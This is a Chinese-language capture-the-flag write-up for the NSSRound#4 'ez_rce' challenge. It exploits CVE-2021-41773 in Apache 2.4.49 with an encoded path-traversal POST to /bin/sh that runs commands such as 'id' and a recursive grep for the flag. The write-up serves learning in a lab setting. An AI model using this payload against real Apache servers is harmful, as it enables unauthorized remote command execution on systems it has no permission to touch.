NSS Round#4 ez_rce

ez_rce(NSSRound#4)

笔者尽量写的详细一点，方便大家理解和复现

TOPIC&ANALYSE

页面只有"It works"字样

寻找突破口

我们通过开发者工具看到网络信息-标头-Server看到服务器采用的是Apache/2.4.49(Unix)

尝试从此入手

得知Apache/2.4.49(Unix)有目录穿越漏洞，我们以此为突破口

CVE-2021-41773

• Apache版本 = 2.4.49

• 穿越的目录允许被访问

在服务端开启了gi或者cgid这两个mod的情况下，这个目录穿越漏洞可以执行任意命令

ATTACK

我们拦截到数据包之后，通过Action-Send to Repeater进入重发模块，在这里可以对数据包进行修改并且即时得到回显

在Request处右键，选择Change request method，将GET方法改成POST方法，接着就可以写入payload了

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo;id

重点在/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh，%2e是.的url编码，所以这一段其实就是/cgi-bin/../../../../bin/sh

echo;xxx则是命令执行

跟进/flag_is_here发现还有文件夹

这里我们用grep来进行过滤来读flag

echo;grep -r "NSS" /flag_is_here

DONE